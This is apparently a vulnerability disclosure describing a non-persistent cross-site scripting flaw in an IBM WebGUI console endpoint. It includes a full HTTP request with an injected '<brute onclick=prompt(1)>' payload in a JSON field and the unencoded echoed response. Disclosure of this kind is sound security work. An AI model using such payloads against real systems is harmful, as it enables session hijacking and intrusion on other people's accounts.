Non-Persistent Cross-Site Scripting (XSS) vulnerability in WebGUI

Problem

The application server does not properly encode special characters that

are interpreted as JavaScript code as can be seen via HTTP request/response below.

HTTP Request:

POST /ibm/console/webtop/raapi/relationships/ HTTP/1.1

Host: <hostname>:16311

Connection: close

Content-Length: 294

Accept: application/javascript, application/json

Origin: https://<hostname>:16311

X-Requested-With: XMLHttpRequest

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like

Gecko) Chrome/78.0.3904.97 Safari/537.36

Content-Type: application/json

Sec-Fetch-Site: same-origin

Sec-Fetch-Mode: cors

Referer: https://<hostname>:16311/ibm/console/contentRender.do?

oid=_2114102044&pageid=item.admin.navigationElement.RelationshipEditor;com.ibm.tivoli.

em.iscmodule&XSS=56a286028ad6b8fb5b5cc0823e441fbe

Accept-Encoding: gzip, deflate

Accept-Language: en-US,en;q=0.9

Cookie: -- omitted --

{"name":"<brute onclick=prompt(1)>here","displayName":"here1","displayNameKey":"","des

cription":"xsstest","descriptionKey":"","dataSources":"DSP","multiDSAggregationEnabled

":"false","definition":{"type":"relationshipColumn","relationshipColumn":

{"column":"AckTime","keyColumn":"Acknowledged"}}}

HTTP Response:

HTTP/1.1 400 Bad Request

X-Powered-By: Servlet/3.0

Content-Type: application/json

Content-Language: en-US

Connection: Close

Content-Length: 62

{"message":"<brute onclick=prompt(1)>here is an invalid name"}

So the payload is being executed and you get a dialog box pop up on screen